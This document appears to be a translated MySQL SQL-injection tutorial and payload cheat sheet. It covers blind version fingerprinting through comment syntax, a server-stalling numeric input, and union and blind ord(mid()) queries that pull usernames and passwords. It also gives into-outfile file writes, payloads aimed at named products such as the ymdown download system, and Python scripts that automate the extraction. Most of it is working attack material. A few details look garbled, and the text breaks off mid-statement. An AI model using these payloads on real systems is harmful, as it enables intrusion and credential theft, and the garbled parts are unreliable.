For the purposes of this example, MySQL appears to be the database most commonly used on the web; similar techniques may apply to others. Every SQL product has its own "unique features". MySQL allows comments inside SQL statements:
select * from table /* foo */
MySQL also has an extension: MySQL-specific code can be placed inside the comment, and MySQL will execute it:
select /*! SQL_NO_CACHE */ * from table
Every database other than MySQL treats the above as a plain comment. MySQL looks inside the comment and may change its behavior accordingly. The comment can also carry a version number, in which case the code is executed only if the server is at least that version, for example 4.0.0 or higher:
select /*!40000 SQL_NO_CACHE */ * from table
This is extremely useful for a penetration tester who has to discover blindly (without error output) which database is in use and which version:
Try:
http://foo/web.php?table=38 - we get the normal screen
http://foo/web.php?table=38/*%20s*/ - we get the normal screen (a plain comment is ignored)
http://foo/web.php?table=38/*!%20s*/ - we get an error screen, because the text inside the comment is executed and "38 s" is a syntax error: MySQL is in use
http://foo/web.php?table=38/*!30000%20s*/ - we get an error screen: MySQL is at least 3.x.x
http://foo/web.php?table=38/*!40000%20s*/ - we get an error screen: MySQL is at least 4.x.x
http://foo/web.php?table=38/*!50000%20s*/ - we get the normal screen: MySQL is below 5.x.x
http://foo/web.php?table=38/*!40020%20s*/ - we get the normal screen: MySQL is below 4.0.20
http://foo/web.php?table=38/*!40017%20s*/ - we get an error screen: MySQL is at least 4.0.17
http://foo/web.php?table=38/*!40018%20s*/ - we get the normal screen: MySQL is below 4.0.18
We can conclude that the site runs MySQL 4.0.17. (The five-digit number is major*10000 + minor*100 + patch, so 40017 means 4.0.17, and the code inside /*!NNNNN ... */ runs only when the server version is NNNNN or higher; the digits must follow the ! directly.)
This is useful information, because we then know which exploits/vulnerabilities to try. Different MySQL series (3.x.x, 4.x.x and 5.x.x) provide different functions.
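The version probe above is a yes/no oracle, so it can be driven as a binary search instead of being guessed by hand. The following is an added example, not part of the original notes: a Python model of how MySQL treats /*!NNNNN ... */ comments (a constructed stand-in for a real server, built from the behavior described above; no server is contacted) and a fingerprint routine that uses it. The parameter table=38 and the probe body s are taken from the walkthrough; make_server, fingerprint and the numeric version encoding used by the simulator are this example's own assumptions.

```python
"""Blind MySQL fingerprinting through /*!NNNNN ... */ version comments.

Added example, not from the original notes. No real server is contacted:
make_server() is a constructed model of how MySQL treats version comments
and plays the role of the target application.
"""
import re

# /*!  optional 5-digit version  body  */
VERSION_COMMENT = re.compile(r"/\*!(\d{5})?(.*?)\*/", re.S)


def make_server(server_version: int):
    """Return oracle(fragment) -> 'normal' | 'error' for a simulated MySQL build.

    server_version uses MySQL's numeric form (assumption of this model:
    major*10000 + minor*100 + patch, e.g. 4.0.17 -> 40017). The fragment is
    the (URL-decoded) text that follows '?table=38', i.e. it lands right after
    the literal 38 in the SQL statement.
    """
    def oracle(fragment: str) -> str:
        for m in VERSION_COMMENT.finditer(fragment):
            required = int(m.group(1)) if m.group(1) else 0
            body = m.group(2).strip()
            # The body is executed only if the server is at least `required`;
            # "38 s" is not valid SQL, so executing it produces the error screen.
            if body and server_version >= required:
                return "error"
        return "normal"  # plain /* ... */ comments are always ignored
    return oracle


def is_mysql(oracle) -> bool:
    """Plain comment ignored but /*! ... */ executed: that combination is MySQL."""
    return oracle("/* s */") == "normal" and oracle("/*! s */") == "error"


def runs_at_least(oracle, version: int) -> bool:
    """True if /*!<version> s */ is executed, i.e. the server is >= version."""
    return oracle(f"/*!{version:05d} s */") == "error"


def fingerprint(oracle, lo: int = 30000, hi: int = 59999) -> int:
    """Binary-search the highest NNNNN whose version comment still executes."""
    if not is_mysql(oracle):
        raise ValueError("not MySQL: version comments are not executed")
    if not runs_at_least(oracle, lo) or runs_at_least(oracle, hi + 1):
        raise ValueError("server version outside the search range")
    # Invariant: runs_at_least(lo) is True and runs_at_least(hi + 1) is False.
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if runs_at_least(oracle, mid):
            lo = mid
        else:
            hi = mid - 1
    return lo


def dotted(version: int) -> str:
    """40017 -> '4.0.17'."""
    return f"{version // 10000}.{version // 100 % 100}.{version % 100}"


if __name__ == "__main__":
    srv = make_server(40017)  # the server from the walkthrough above
    print(dotted(fingerprint(srv)))  # 4.0.17, after about 15 probes
```

Against a real target, oracle() would send the HTTP request and classify the response as the normal page or the error page; nothing else changes. The search covers 30000..59999 in about 15 requests, versus one request per candidate version when probing by hand, and it only works while the error screen stays distinguishable from the normal one.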
Another, independent idea. Most installations have not changed this behavior; check the default behavior of the MySQL engine:
mysql> select 9e0;
+-----+
| 9e0 |
+-----+
|   9 |
+-----+
1 row in set (0.02 sec)
mysql> select 9e2;
+-----+
| 9e2 |
+-----+
| 900 |
+-----+
1 row in set (0.00 sec)
Most language interpreters try to guess what kind of thing their input is. Typically the input is only checked for length and passed on, so we can freely send 9e9 to the database on the backend. PHP users are often advised to check input with a numeric test such as is_numeric() (is_int() does not apply here, since $_GET values always arrive as strings). That does not block this trick: 9e9 is numeric and only three characters long, yet it may take the database server down.
Tonu had a good penetration-test case where it was almost impossible to get any error message out of the system. Finally, Tonu tried sending 9e999 somewhere where the field was particularly large, and got about 30 seconds of delay followed by a "PHP timeout in something.inc" message. Anyone who does penetration testing knows how important every bit of information about the system internals is. Using extremely large numbers and missing whitespace, Tonu was then able to download the company's file.
Summary of classic injection statements:
or 1=1
' or 1=1
/*
%23 (URL-encoded #, the other MySQL line comment)
' and password='mypass
id=-1 union select 1,1
id=-1 union select char(97),char(97),char(97)
id=1 union select 1,1 from members
id=1 union select 1,1 from admin
id=1 union select 1,1 from user
userid=1 and password='mypass'
userid=1 and mid(password,1,1)=char(...)
userid=1 and mid(password,4,1)=char(97)
and ord(mid(password,1,1))>... (the ord function is very useful: it returns an integer, so each character can be found by comparison instead of by equality)
and LENGTH(password)=6 (probe the LENGTH of the password)
and LEFT(password,1)='m'
and LEFT(password,2)='my'
...... and so on
union select 1,username,password from user /*
' union select 1,username,password from user /*
=' union select 1,username,password from user /* (the union can follow a number directly, or a closing quote after =)
99999 union select 1,username,password from user /*
into outfile 'c:/file.txt' (export to a file)
=' or 1=1 into outfile 'c:/file.txt'
1 union select 1,username,password from user into outfile 'c:/user.txt'
SELECT password FROM admins WHERE login='John' into dumpfile '/path/to/site/file.txt'
id=' union select 1,username,password from user into outfile '...'
id=-1 union select 1,database(),version() (useful query against any application)
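The ord(mid(password,N,1)) and LENGTH(password) probes in the list above (and the ord(mid(password,1,1))=49 style checks in the ymdown example further down) are a boolean oracle too, so each character can be recovered with a binary search on ord() instead of one probe per candidate value. The following is an added example, not from the original notes or from any product mentioned on this page: an in-memory SQLite database stands in for MySQL (an assumption), with mid() and ord() registered as user functions so the MySQL-style payloads run unchanged. The user table, its rows, the vulnerable lookup, and the hardened lookup with a strict digits-only check (the counterpart to the 9e9 discussion above) are all constructed for this demo.

```python
"""Boolean-blind password extraction with LENGTH() and ord(mid()) probes.

Added example, not from the original notes. SQLite stands in for MySQL
(assumption); the table, rows and queries below are constructed for the demo.
"""
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    # SQLite has no mid()/ord(); register Python versions so the MySQL-style
    # payloads from the notes can be used verbatim.
    con.create_function("mid", 3, lambda s, pos, n: s[pos - 1:pos - 1 + n])
    con.create_function("ord", 1, lambda s: ord(s[0]) if s else 0)
    con.execute("CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO user VALUES (?, ?, ?)",
                    [(1, "admin", "mypass"), (2, "guest", "letmein")])  # constructed rows
    return con


def vulnerable_lookup(con: sqlite3.Connection, userid: str) -> list:
    """The pattern from the notes: SELECT ... WHERE userid = $id by concatenation."""
    sql = "SELECT username FROM user WHERE userid = " + userid  # injectable
    return con.execute(sql).fetchall()


def is_plain_integer(value: str) -> bool:
    """Strict check: ASCII digits only. 9e9 or 9e999 pass lenient numeric
    checks (PHP's is_numeric(), float parsing) but fail this one."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def safe_lookup(con: sqlite3.Connection, userid: str) -> list:
    """Hardened form: validate, then bind; the value never becomes SQL text."""
    if not is_plain_integer(userid):
        return []  # a real application would answer 400 here
    return con.execute("SELECT username FROM user WHERE userid = ?", (int(userid),)).fetchall()


def row_present(con: sqlite3.Connection, condition: str) -> bool:
    """The oracle: an injected AND condition keeps or drops the userid=1 row."""
    return len(vulnerable_lookup(con, "1 and " + condition)) > 0


def extract_password(con: sqlite3.Connection, max_len: int = 64) -> str:
    # Step 1: LENGTH(password) = n, one probe per candidate length.
    length = next((n for n in range(1, max_len + 1)
                   if row_present(con, f"LENGTH(password) = {n}")), None)
    if length is None:
        raise ValueError("no length probe matched")
    # Step 2: per position, binary-search the byte value with '>' comparisons:
    # 8 probes per character instead of up to 256 equality probes.
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 0, 255
        while lo < hi:
            m = (lo + hi) // 2
            if row_present(con, f"ord(mid(password, {pos}, 1)) > {m}"):
                lo = m + 1
            else:
                hi = m
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    db = build_db()
    print("union:", vulnerable_lookup(db, "-1 union select password from user where userid = 1"))
    print("blind:", extract_password(db))
    print("safe :", safe_lookup(db, "1 or 1 = 1"), safe_lookup(db, "9e9"))
```

When the page shows query output, the union form in the first print line gets the password in one request; when it only shows "row" or "no row", extract_password does it in a few dozen requests. Against a real target, vulnerable_lookup would be replaced by an HTTP request and row_present by a check on the response body.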
Commonly used test statements (always-true conditions):
SELECT * FROM table WHERE 1=1
SELECT * FROM table WHERE 'uuu'='uuu'
SELECT * FROM table WHERE 1<>2
SELECT * FROM table WHERE 3>2
SELECT * FROM table WHERE 2<3
SELECT * FROM table WHERE 1
SELECT * FROM table WHERE 1+1
SELECT * FROM table WHERE 1--1 (in MySQL, -- starts a comment only when followed by whitespace, so this is 1 - (-1) = 2, i.e. true)
SELECT * FROM table WHERE isnull(NULL)
SELECT * FROM table WHERE isnull(COT(0)) (COT(0) returns NULL on old MySQL versions; newer versions raise an out-of-range error instead)
SELECT * FROM table WHERE 1 IS NOT NULL
SELECT * FROM table WHERE NULL IS NULL
SELECT * FROM table WHERE 2 BETWEEN 1 AND 3
SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c'
SELECT * FROM table WHERE 2 IN (0,1,2)
SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END
For example, the Night Cat (ymdown) download system version 1.0:
id=1 union select 1,1,...,1 (one 1 per selected column)
union select 1,1,...,1 from ymdown_user
union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
id=10000 union select 1,1,...,1 from ymdown_user where id=1 and groupid=1
union select 1,username,1,password,1 from ymdown_user where id=1 (substitute the columns to find the password)
union select 1,1,...,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (check the first character of the password)
union select 1,1,...,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (second character)
union select 1,1,...,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51
...... and so on
Example 2: the "gray track" id conversion test (by meteor):
union%20(SELECT%20allowsmilies,public,userid,0000-0-0,user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
union%20(SELECT%20allowsmilies,public,userid,0000-0-0,pass(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate
The constructed statements (the union must select as many columns as the original query, six here):
SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid=1 union (select 1,1,1,1,1,1 from user where userid=1)
SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid=1 union (select 1,1,1,1,username,password from user where userid=1)
UNION%20(SELECT%20...,0,205-01-01,a,password%20FROM%20user%20WHERE%20userid%20=%20...)%20order%20by%20eventdate
UNION%20(SELECT%20...,0,12695,1999-01-01,a,password%20FROM%20user%20WHERE%20userid=13465)%20order%20by%20eventdate
UNION%20(SELECT%20...,0,12695,1999-01-01,a,userid%20FROM%20user%20WHERE%20username=sandflee)%20order%20by%20eventdate (look up sandflee's userid)
(SELECT a FROM table_name WHERE a=10 AND b=1 ORDER BY a LIMIT 10)
SELECT * FROM article WHERE articleid=$id union select * FROM ...... (when the other table has the same column layout you can select its fields directly)
SELECT * FROM article WHERE articleid=$id union select 1,1,1,1 FROM ...... (when it differs, pad with constants)
Special tips: things to type into forms, search boxes and similar places (LIKE wildcards: _ matches one character, % any string):
"___"
"._"
"%"
% order by articleid /*
% order by articleid #
_ order by articleid /*
_ order by articleid #
$command = "dir c:"; system($command);
SELECT * FROM article WHERE articleid=$id
1 and 1=2 union select * from user where userid=1 /*
(SELECT * FROM article WHERE articleid=1 and 1=2 union select * from user where userid=1 /*)
1 and 1=2 union select * from user where userid=1
Statement format: create a database and a table, then insert rows:
create database `injection`;
create table `user` (
`userid` int(11) not null auto_increment,
`username` varchar(20) not null default '',